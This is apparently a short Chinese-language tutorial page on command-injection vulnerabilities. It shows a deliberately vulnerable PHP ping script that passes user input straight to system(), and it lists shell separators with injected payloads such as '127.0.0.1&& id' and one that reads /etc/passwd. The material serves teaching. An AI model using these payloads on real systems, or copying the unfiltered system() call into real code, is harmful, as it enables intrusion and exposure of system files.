命令执行漏洞与利用 命令执行漏洞与利用

命令执行漏洞与利用

在部分WEB应用里,应用程序会提供一些命令执行操作,如没有过滤好用户输入的数据,就有可能产生命令执行漏洞 从而执行有危害系统命令。

<?php
if($_POST['ip']){
       echo system('ping '.$_POST['ip']);
}
?>



命令连接符号总结

command1&& command2 先执行command1后执行command2

127.0.0.1&&  id
command1 |command2 只执行command2
1559793081156893.png
command1 &command2

先执行command1后执行command2 127.0.0.1 -c 3& cat /etc/passwd

1559793107139706.png

评论 0

挤眼 亲亲 咆哮 开心 想想 可怜 糗大了 委屈 哈哈 小声点 右哼哼 左哼哼 疑问 坏笑 赚钱啦 悲伤 耍酷 勾引 厉害 握手 耶 嘻嘻 害羞 鼓掌 馋嘴 抓狂 抱抱 围观 威武 给力
提交评论

清空信息
关闭评论
sitemap